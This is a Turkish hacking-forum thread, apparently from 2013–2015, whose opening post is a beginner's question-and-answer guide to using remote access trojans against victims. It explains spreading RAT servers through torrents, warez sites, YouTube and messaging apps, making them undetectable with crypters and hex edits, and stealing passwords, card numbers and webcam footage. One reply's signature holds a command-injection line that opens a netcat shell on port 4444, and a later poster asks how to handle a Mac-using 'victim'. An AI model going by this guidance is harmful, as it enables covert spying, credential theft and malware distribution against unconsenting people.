Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.





RAT Yenilere -Soru Cevap Şeklinde.

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 20-10-2013 16:39   #1
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
10/2013
Nereden
Microsoft®
Mesajlar
Konular

Teşekkür (Etti): 2
Teşekkür (Aldı): 125


RAT Yenilere -Soru Cevap Şeklinde.



Soru-RAT Nedir?
Cevap-Rat aynı zamanda Remote Administrator Tool(Uzaktan Admin Olarak Kontrol) Olarak Adlandırılır.Genel olarak Kötü Amaçlı Kullanılır,Yani bilgisiyar kullanır gibi,Kişilerin bilgilerini çalmak,dosyalarını düzenlemek ve silmek gibi yönlerde kullanılabilir.Kurban bulmak için server dosyanızı karşı tarafa gönderip açmasını sağlamaktır.

Soru–
Spread Nasıl Yapılır?[Yaymak]
Cevap-RAT Servarlarınızı bir çok yol ile yayabilirsiniz.Aşşağıda belirteceğim yollar ile kurban kasabilirsiniz.
-P2P(PerToPer) Yani uTorrent,Pirate Bay Gibi çeşitli yollarla.
-Anlık Sohbet Alanı İçerisinde Yapılabilir Örneğin;
-Skype ,MSN, Aim Ve bir çok anlık görüşme yapabildiğiniz uygulamalar.



Soru - Kurban'ı Nasıl Control Ederim?
Cevap -Rat'ın Bilgisayarınızda kurulu olması gerekiyor.Rat client'i ile kurbanlarınızı kontrol edebilirsiniz.

Soru – RAT Kurmak İçin Ne Gerekli?
Cevap - Evet size Windows OS Sistemi Gereklidir,Tabikide Rat da kullanacağınız Port Modeminizin ara yüzüne girip açılması gereklidir.Google'da PortForwarding diye aratıp Modeminizi seçtikten sonra uygulamarı yaparak Portlarınızı açabilirsiniz.

Soru – Nasıl Port Açarım?
Cevap-Port açmak çok basittir ama RAT için çok önemlidir,Çünkü RAT'ın mantığı port üzerinedir,Rat port aracılığı ile bağlantı kurar ve firewall'ı bypass eder ve bağlantı kurulur.

Eğer port açmakta sıkıntı yaşayan olursa ÖM Atmaları Yeterli Olur Elimden Geldiğince Yardımcı Olabilirim.


Soru – Server'ımı Nasıl FUD Yaparım?
Cevap - Eğer Fud Server yapmak istiyorsanız,Sitemizin Crypter Bölümünde sürekli paylaşılan güncel fud crypterlar ile fud layabilirsiniz.Aynı Zamanda HackerToolv2(v3 yakında çıkacak) programı yardımıyla serverınızda hex editlemeleri yapıp kendinizi geliştirebilir ve fud yapabilirsiniz.


Soru – Kendi server'ımı açtım Nasıl Temizlerim?
Cevap -Öncelike Bağlantı aldıysanız eğer RAT'dan kendi bağlantınızı "uninstall" edebilirsiniz,Başka bir çözüm yolu ise Malware Anti Bytes , ve Anti Malware Programını kullanmaktır.
Kökten Çözüm ise Regedit'den Serverınızı silmektir.Bu işlemi yaparken görev yöneticisinden explorer.exe yi tamamen sonlandırmanız gerekiyor.


Soru –Yasal mı Değilmi?
Cevap - Evet bazı Rat lar yasal bazıları ise yasal değildir.Legal Ratlarda backdoor olmaz ve kişiler istedikleri zaman bağlantıyı kesebilirler ÖRN: TeamViewer .Yasal Olmayan ratlar genelde hack ve bilgi çalma işlerinde kullanılır.

Yasal Olanlar:
TeamViewer– Herhangi bir bilgisayara karşı tarafın izni ile kontrol edebilme.
UltraVNC – Uzaktan Destek İstek karşılığında kontrol yazılımıdır..
Ammyy Admin – Ammyy admin en çok güvenilir uzaktan kontrol yazılımıdır.Uzaktan yardım edebilir ve yönetebilirsiniz.
Mikogo – Mikogo online toplantı amacıyla kullanılabilir, Web Konferans & Uzaktan Kontrol Araçları. Ekranınızı aynı anda 10 kişi ile paylaşabileceğiniz bir yazılımdır.
Bu tarz programların yasal olma nedeni ise,Yapılacak kontrolün 2 kişi tarafından onaylanıp açılmasıdır.Bu yüzden herhangi bir olumsuz durum yoktur.

Yasal Olmayanlar:
Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat
DarkComet Rat

Neden Yasal Değil?
Yukarıdaki sorularda açıladığım gibi,Bu tarz programlar karşı tarafta port açar ve bu şekilde bağlantı kurulur,siz bunu yaptığınızda karşı tarafın ruhu duymaz ve insanların kişisel bilgilerine,şifrelerine,vs vs .İzinsiz ulaştığınızdan dolayı yasallıktan çıkar ve Illegal bir hal alır.

Soru – Nerde Ve Nasıl Server'ımı Yayarım?
Cevap– Yaymak için bir çok yol var.Bunlardan bir tanesi warez websiteleri, P2P Torrent Siteleri(uTorrent, Pirate bay), YouTube Gibi. Evet bir çok kişi spreadi otomatik programlarla yaparlar auto-spread gibi programlarla.Ama bu işin en verimli olacağı hal,Serverınızın fud olmasıdır.


Soru – DNS Host Nedir? (DOMAIN NAME SYSTEM)
Cevap - DNS,Domain Name System’in kısaltılmış şeklidir. Türkçe karşılığı ise Alan İsimlendirme Sistemi olarak bilinir.

DNS, 256 karaktere kadar büyüyebilen host isimlerini IP’ye çevirmek için kullanılan bir sistemdir. Host ismi,tümüyle tanımlanmış isim (full qualified name) olarak da bilinir ve hem bilgisayarın ismini hem de bilgisayarın bulunduğu Internet domainini gösterir. Örneğin murat.anadolu.com.tr ismi. Bu isimde ’anadolu.com.tr’ ifadesi internet domainini, ’murat’ ifadesi ise bu domaindeki tek bir makineyi belirtir. DNS , verilen bir makina adının IP adresini çözerek makinaların Internet üzerinde host isimleri ile haberleşmelerine olanak tanır.

DNS’in amacı nedir?

DNS, kolay anlaşılabilir ve kullanılabilir makine ve alan isimleri ile makine IP adresleri arasında çift taraflı dönüşümü sağlar. IP adreslerinin gündelik hayatta kullanımı ve hatırlanması pek pratik olmadığı için domain isimlendirme sistemi kullanılır. Ana amacı, ağ uzerinden gelen alan adı veya IPnumarası ile ilgili sorgulamalara yanıt vermektir. Bu amaç için cok yaygın olarak \\”Berkeley Internet Name Domain (BIND)\\” yazılımı kullanılmaktadır. Siz bir siteye erişmek istediğinizde, DNS sayesinde hangi site nerde , hangi IP hangi bilğisayara ait olduğu belirlenir, ve istediğiniz yere erişirsiniz.


Soru – RAT ile neler yapabilirim?
Cevap – Yapabileceklerinizin Listesi:
• Dosya Yönetimi
• Web tarayıcısı Kontrolü(Site Açtırma,Başlangıç Sitesini Değiştirmek.)
• Sistem bilgilerini alma(OS Versiyon,Hangi Antiyi Kullanıyor?, Ram Memory,Bilgisayar ismi Gibi.)
• Şifreleri alma, kredi kart numaralarını almak veya özel bilgileri almak.
• Bilgisayar ekran görüntüsünü görmek ve kontrol edebilme.
• Kamera Ve Ses Kaydı Yaoabilme
• Mouse kontrolü
• Silme, Değiştirme,İndirme, Yükleme veya dosyaların yerini değiştirme gibi.



___________________________________________

# _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.


Konu DarkPasha tarafından (26-10-2013 03:09 Saat 03:09 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

azda22, oney31 Teşekkür etti.
Alt 25-10-2013 18:59   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
10/2012
Mesajlar
Konular

Teşekkür (Etti): 72
Teşekkür (Aldı): 1




ben port acamıyorum bi yardımcı olurmsn tp lik td854w
 Offline  
 
Alıntı ile Cevapla
Alt 25-10-2013 19:00   #3
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
04/2013
Nereden
Bileceksiniz
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 147
Teşekkür (Aldı): 252




Eline sağlık darkcomet yasalmı ?



___________________________________________

Yazacak bişe bulamadım

 Offline  
 
Alıntı ile Cevapla
Teşekkür

yakamoz9898 Teşekkür etti.
Alt 25-10-2013 21:10   #4
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2013
Nereden
root@db43
Mesajlar
Konular

Teşekkür (Etti): 13
Teşekkür (Aldı): 113




Port açmakla firewall'ı bypass etmenin arasında bir bağlantı yok nasıl web server 80'inci portu kullanıyorsa RAT da o portu kullanıyor.Bypass etmenin asıl mantığı saldırganın bilgisayarının değil kurbanın bilgisayarının bağlantıyı kurmasıdır.



___________________________________________

Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
 Offline  
 
Alıntı ile Cevapla
Alt 25-10-2013 22:13   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
09/2012
Nereden
İstanbul
Yaş
43
Mesajlar
Konular

Teşekkür (Etti): 174
Teşekkür (Aldı): 208




darkcomet'i unutmuşsun onu rattan saymıyonmu yoksa yaralı konu egitici ..



___________________________________________

 Offline  
 
Alıntı ile Cevapla
Alt 26-10-2013 03:10   #6
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
10/2013
Nereden
Microsoft®
Mesajlar
Konular

Teşekkür (Etti): 2
Teşekkür (Aldı): 125




konumu okuyan birilerini bulmak güzel



___________________________________________

# _DarkPasha_# = Online

Unutulmak istemiyorsan ; Ya okunacak şeyler yaz ya da yazılmaya değer şeyler yap.

 Offline  
 
Alıntı ile Cevapla
Alt 26-10-2013 09:58   #7
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
10/2013
Nereden
Tahtalı Köy
Mesajlar
Konular

Teşekkür (Etti): 4
Teşekkür (Aldı): 23




(Yeniler İçin.) İyi Anlatım.



___________________________________________

Bügün Küçük Uygulamalar Yarın Büyük İşletim Sistemleri!
Gönüllü Aranıyor.RpS_smile:

 Offline  
 
Alıntı ile Cevapla
Alt 31-10-2013 07:19   #8
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
11/2007
Nereden
Paris
Mesajlar
Konular

Teşekkür (Etti): 69
Teşekkür (Aldı): 18




Teşekurler eline saglık
 Offline  
 
Alıntı ile Cevapla
Alt 25-06-2015 10:05   #9
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2015
Mesajlar
Konular
2

Teşekkür (Etti): 4
Teşekkür (Aldı): 0




Merhabalar ben çok enteresan bir olayla ile karşılaştım programım sorunsuz calısmakta fud vs herşeyim tastamam fakat kurbanımın bilgisayarının işletim sistemi mac. cıktı bu durumda ne yapmam gerek ?
 Offline  
 
Alıntı ile Cevapla
Alt 25-06-2015 10:44   #10
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2015
Mesajlar
9
Konular
0

Teşekkür (Etti): 0
Teşekkür (Aldı): 0




teşekkürler
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau